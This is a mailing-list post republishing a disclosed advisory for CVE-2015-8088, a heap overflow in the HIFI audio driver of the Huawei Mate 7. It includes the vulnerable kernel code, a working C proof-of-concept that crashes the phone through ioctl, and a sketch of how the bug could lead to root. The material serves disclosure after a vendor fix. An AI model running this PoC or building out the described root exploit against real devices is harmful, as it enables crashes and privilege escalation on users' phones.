|
Message-ID: <etPan.566c348a.736a8748.22f4@s3cur1ty-lab.local> Date: Sat, 12 Dec 2015 22:51:54 +0800 From: Pray3r <pray3r.z@...il.com> To: oss-security@...ts.openwall.com Subject: CVE-2015-8088: Heap Overflow Vulnerability in the HIFI Driver of Huawei Smart Phone Hello everyone, One month ago, I was reported heap overflow vulnerability of Huawei smart phone(CVE-2015-8088) to Huawei PSIRT, but they didn’t disclosure the detail of this vulnerability. So I’m sending the original version of the vulnerability advisory to sos-sec mailing list just for record[1]. [1]. https://github.com/citypw/DNFWAH/raw/master/5/d5_0x03_DNFWAH_cve-2015-8088-heap-overflow-analysis.txt |=-----------------------------------------------------------------=| |=-----=[ D O N O T F U C K W I T H A H A C K E R ]=-----=| |=-----------------------------------------------------------------=| |=------------------------[ #5 File 0x03 ]-------------------------=| |=-----------------------------------------------------------------=| |=-------=[ CVE-2015-8088: Heap Overflow Vulnerability ]=----------=| |=--------=[ in the HIFI Driver of Huawei Smart Phone ]=-----------=| |=-----------------------------------------------------------------=| |=-----------------------=[ By Pray3r ]=-------------------------=| |=-----------------------------------------------------------------=| |=-----------------------------------------------------------------=| |=-----------------------=[ Dec 9 2015 ]=--------------------------=| |=-----------------------------------------------------------------=| --[ Content 0x00. Summary 0x01. Description 0x02. Impact 0x03. Affected 0x04. Patch 0x05. Timeline --[ 0x00. Summary /dev/hifi_misc module of Huawei Mate 7 smart phone has an input check error, which allows the user-mode application to modify kernel-mode memory data and maybe make system break down or application elevate privilege. --[ 0x01. Description /dev/hifi_misc is an interface for a user-mode application to interact with kernel module of hisi chipset. It is very likely that hifi_misc is related with hifi audio features. Seen from drivers/hisi/hifidsp/hifi_lpp.c, one could send messages to hifi's kernel module by invoking ioctl() with HIFI_MISC_IOCTL_WRITE_PARAMS: < drivers/hisi/hifidsp/hifi_lpp.c > static long hifi_misc_ioctl(struct file *fd, unsigned int cmd, unsigned long arg) { [...] switch(cmd) { [...] case HIFI_MISC_IOCTL_WRITE_PARAMS : /* write algo param to hifi*/ ret = hifi_dsp_write_param(arg); break; [...] } [...] } < / > After ioctl(), hifi_dsp_write_param() is called with the parameter directly passed from user-space: < drivers/hisi/hifidsp/hifi_lpp.c > int hifi_dsp_write_param(unsigned long arg) { int ret = OK; phys_addr_t hifi_param_phy_addr = 0; void* hifi_param_vir_addr = NULL; CARM_HIFI_DYN_ADDR_SHARE_STRU* hifi_addr = NULL; struct misc_io_sync_param para; [...] if (copy_from_user(¶, (void*)arg, sizeof(struct misc_io_sync_param))) { // arg --> para loge("copy_from_user fail.\n"); ret = ERROR; goto error1; } [...] hifi_param_vir_addr = (unsigned char*)ioremap(hifi_param_phy_addr, SIZE_PARAM_PRIV); // heap alloc if (NULL == hifi_param_vir_addr) { loge("hifi_param_vir_addr ioremap fail\n"); ret = ERROR; goto error2; } [...] ret = copy_from_user(hifi_param_vir_addr, para.para_in, para.para_size_in); // heap overflow if ( ret != 0) { loge("copy data to hifi error! ret = %d", ret); } [...] } < / > Parameter arg is a struct pointer points to user-space memory. After initialization of hifi_dsp_write_param(), user-space memory pointed by arg is copied to para via copy_from_user(). Without any verification, all the member variables of para is fully controlled by user-space application. The struct of para: struct misc_io_sync_param { void * para_in; unsigned int para_size_in; void * para_out; unsigned int para_size_out; }; Next, a memory copy is invoked as copy_from_user(hifi_param_vir_addr, para.para_in, para.para_size_in) 1. hifi_param_vir_addr points to a kernel heap block allocated by ioremap(), regarded as the address of destination memory block. The size of the this heap block is SIZE_PARAM_PRIV (equals to 200 * 1024) bytes. 2. para.para_in is a pointer controlled by user-space, regarded as the address of original memory block. 3. para.para_size is an unsigned int controlled by user-space, regarded as the size of original memory block. Since there are not any verification of para_size and para_in, if para.para_size is larger than 200*1024, say 300*1024, a typical heap overflow is triggered. The source code of our poc: < poc.c > /* * * HuaWei Mate7 hifi driver Poc * * Writen by pray3r<pray3r.z@...il.com> * */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/ioctl.h> #define HIFI_MISC_IOCTL_WRITE_PARAMS _IOWR('A', 0x75, struct misc_io_sync_param) struct misc_io_sync_param { void * para_in; unsigned int para_size_in; void * para_out; unsigned int para_size_out; }; int main(int arg, char **argv) { int fd; void *in = malloc(300 * 1024); void *out = malloc(100); struct misc_io_sync_param poc; poc.para_in = in; poc.para_size_in = 300 * 1024; poc.para_out = out; poc.para_size_out = 100; fd = open("/dev/hifi_misc", O_RDWR); ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc); free(in); free(out); return 0; } < / > Execute the crash_poc will break down Huawei Mate 7. Be aware that the poc should be executed under system or audio privilege, since /dev/hifi_misc is only writable to audio and system user. --[ 0x02. Impact First, with a large value set to para.para_size, the smart phone will break down because of heap overflow inside kernel space. Second, this vulnerability could be used as a kernel information disclosure if para.para_in points to kernel objects and the exploit is wrapped with heap fengshui technique. Third, sophisticated exploitation methodology such as heap spray of thread_info published by Keen Team, an attacker could build a workable exploit gaining the root privilege of the smart phone. Although /dev/hifi_misc is only writable to audio and system user, an attacker may approach the root privilege by first gaining audio or system privilege via other bugs or tricks then exploit this kernel vulnerability to gain root. Such two step exploitation methodology to gain root privilege of Huawei Mate 7 is something that Keen Team had utilized before: 1. http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-414174.htm 2. http://forum.xda-developers.com/mate-7/general/wip-mate-7-root-bl-unlock-t2995086 --[ 0x03. Affected Model : HUAWEI MT7-TL10 Version : MT7-TL10V100R001CHNC00B133 Android : 4.4.2 Kernel : 3.10.30-00015-g049a08f Other models of Huawei smart phones with hisi chipset may also be affected. --[ 0x04. Patch More information: http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-460347.htm --[ 0x05. Timeline Sep 28 2015 - Report sent to Huawei PSIRT Sep 10 2015 - Huawei confirmed the security issues Nov 04 2015 - Huawei fixed and public the security issues Nov 09 2015 - Update CVE number --- Security is a bitch! Content of type "text/html" skipped Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.